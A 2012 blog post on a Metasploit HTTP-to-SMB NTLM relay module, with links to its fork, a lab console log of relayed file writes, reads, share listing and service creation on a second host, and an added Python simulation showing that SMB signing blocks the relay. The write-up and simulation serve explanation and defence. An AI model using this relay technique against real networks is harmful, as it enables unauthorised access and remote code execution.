Cross-Protocol Chained Pass the Hash for Metasploit

Wednesday, August 29, 2012

Rob Fuller


Every so often someone writes a Metasploit Module that is pretty epic. July 12th was one such day:

[Screenshot of the tweet, taken 2012-07-10]

Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536

Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589

Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170

You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay

Once you have it, you can start doing things like the following (the example resource file puts a file, cats it out, enumerates the available shares, lists the files on a share, and then runs psexec, all from a single URL being loaded):

The .163 address is the victim I tricked into loading a URL, and .182 is the system I want to get onto. This is an HTTP request resulting in an SMB relayed auth. It looks as though multiple targets can be used as relay targets, but I haven't tested this out yet.

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_put' from 172.16.10.163:52327
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt written
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_get' from 172.16.10.163:52328
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - Reading 13 bytes from 172.16.10.182
[*] 172.16.10.163 http_ntlmrelay - ----Contents----
[*] 172.16.10.163 http_ntlmrelay - hi ima secret
[*] 172.16.10.163 http_ntlmrelay - ----End Contents----
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_enum' from 172.16.10.163:52329
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - Shares enumerated 172.16.10.182 IPC$ADMIN$C$
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_ls' from 172.16.10.163:52330
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - Listed 13 files from 172.16.10.182\c$\
[*] 172.16.10.163 http_ntlmrelay - .rnd
[*] 172.16.10.163 http_ntlmrelay - PerfLogs
[*] 172.16.10.163 http_ntlmrelay - config.sys
[*] 172.16.10.163 http_ntlmrelay - inetpub
[*] 172.16.10.163 http_ntlmrelay - xampp
[*] 172.16.10.163 http_ntlmrelay - ProgramData
[*] 172.16.10.163 http_ntlmrelay - MSOCache
[*] 172.16.10.163 http_ntlmrelay - secret.txt
[*] 172.16.10.163 http_ntlmrelay - autoexec.bat
[*] 172.16.10.163 http_ntlmrelay - Windows
[*] 172.16.10.163 http_ntlmrelay - Users
[*] 172.16.10.163 http_ntlmrelay - Program Files
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_rm' from 172.16.10.163:52332
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt deleted
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_pwn' from 172.16.10.163:52333
[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...
[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded
[*] 172.16.10.163 http_ntlmrelay - Obtraining a service manager handle...
[*] 172.16.10.163 http_ntlmrelay - Creating a new service
[*] 172.16.10.163 http_ntlmrelay - Closing service handle...
[*] 172.16.10.163 http_ntlmrelay - Opening service...
[*] 172.16.10.163 http_ntlmrelay - Starting the service...
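The relay in the log above works because the victim's browser answers an NTLM challenge without knowing who actually generated it: the module hands the victim the challenge it just received from the SMB target, and forwards the victim's answer straight back. The Python simulation below is an added example, not code from the module or from Rob Fuller. It models the three parties with constructed credentials (USER, DOMAIN, a placeholder NT_HASH; the two IPs are reused from the log) and simplified NTLMv2 and signing arithmetic, to show two things a defender cares about: the relay never holds the hash and still gets an accepted authentication, and requiring SMB signing, whose session key is derived from that hash, leaves the relayed session unable to issue a single valid request.

```python
import hashlib
import hmac
import os

# Constructed values for the simulation only (no real account or host data):
USER = "alice"
DOMAIN = "CORP"
NT_HASH = bytes(range(16))   # placeholder for MD4(UTF-16LE(password))
VICTIM_IP = "172.16.10.163"  # the host tricked into loading the URL
TARGET_IP = "172.16.10.182"  # the host the relay authenticates to
REQUEST = b"TREE_CONNECT \\\\172.16.10.182\\c$"  # a constructed SMB request


def ntowf_v2(nt_hash, user, domain):
    """NTOWFv2 (MS-NLMP): HMAC_MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def ntlmv2_proof(nt_hash, user, domain, server_challenge, blob):
    """NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || blob), plus the session
    base key HMAC_MD5(NTOWFv2, NTProofStr). Only parties holding the NT hash
    can compute either value."""
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    session_key = hmac.new(key, proof, hashlib.md5).digest()
    return proof, session_key


class SmbTarget:
    """Stand-in for the SMB server at TARGET_IP. It holds the user's NT hash
    (a real member server would pass the response through to a DC) and may
    require SMB signing. The signing MAC is simplified to
    HMAC_MD5(session key, message)[:8]; real SMB1/SMB2 signing differs in
    detail but is keyed from the same session key."""

    def __init__(self, nt_hash, require_signing):
        self.nt_hash = nt_hash
        self.require_signing = require_signing
        self.challenge = None
        self.session_key = None

    def challenge_msg(self):
        # NTLM Type 2 message: a fresh 8-byte server challenge
        self.challenge = os.urandom(8)
        return self.challenge

    def authenticate(self, user, domain, blob, proof):
        # NTLM Type 3 message: recompute NTProofStr and compare
        expected, session_key = ntlmv2_proof(self.nt_hash, user, domain, self.challenge, blob)
        if not hmac.compare_digest(expected, proof):
            return False
        self.session_key = session_key
        return True

    def handle_request(self, msg, signature):
        # With signing off, any request on an authenticated session is served.
        if not self.require_signing:
            return True
        expected = hmac.new(self.session_key, msg, hashlib.md5).digest()[:8]
        return hmac.compare_digest(expected, signature)


class VictimClient:
    """Stand-in for the client at VICTIM_IP: it answers an NTLM challenge from
    whichever server returned a 401 for the URL it was tricked into loading."""

    def __init__(self, nt_hash, user, domain):
        self.nt_hash, self.user, self.domain = nt_hash, user, domain

    def answer(self, server_challenge):
        blob = os.urandom(16)  # simplified NTLMv2 blob (timestamp, client nonce, ...)
        proof, session_key = ntlmv2_proof(self.nt_hash, self.user, self.domain, server_challenge, blob)
        return blob, proof, session_key


def relay_session(require_signing):
    """The http_ntlmrelay pattern: the relay is an HTTP server to the victim and
    an SMB client to the target; it forwards the target's challenge to the
    victim and the victim's answer back to the target.
    Returns (auth_accepted, request_served)."""
    target = SmbTarget(NT_HASH, require_signing)
    victim = VictimClient(NT_HASH, USER, DOMAIN)
    challenge = target.challenge_msg()         # relay -> target: negotiate; target -> relay: challenge
    blob, proof, _ = victim.answer(challenge)  # relay -> victim: 401 with that challenge; victim -> relay: Type 3
    if not target.authenticate(USER, DOMAIN, blob, proof):
        return False, False
    # The relay never held the NT hash, so it cannot derive the session key;
    # all it can send is an unsigned (here: zero-signed) request.
    return True, target.handle_request(REQUEST, bytes(8))


def legitimate_session(require_signing):
    """Control case: the real client talks to the target directly and can sign."""
    target = SmbTarget(NT_HASH, require_signing)
    client = VictimClient(NT_HASH, USER, DOMAIN)
    blob, proof, session_key = client.answer(target.challenge_msg())
    if not target.authenticate(USER, DOMAIN, blob, proof):
        return False, False
    signature = hmac.new(session_key, REQUEST, hashlib.md5).digest()[:8]
    return True, target.handle_request(REQUEST, signature)


if __name__ == "__main__":
    print("relay,  signing off:", relay_session(False))       # (True, True)
    print("relay,  signing on :", relay_session(True))        # (True, False)
    print("direct, signing on :", legitimate_session(True))   # (True, True)
```

The first line of output is the situation in the log: authentication is accepted and the relayed request is served. The second line is the same relay against a target that requires signing: the Type 3 message is still accepted (the challenge-response itself is sound), but the first request fails its MAC check because the relay has no session key, which is why "SMB signing required" on member servers, not just on domain controllers, is the standard mitigation for this class of attack. The third line confirms a real client is unaffected by the setting.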

Let the fun begin...

Cross-posted from Room362
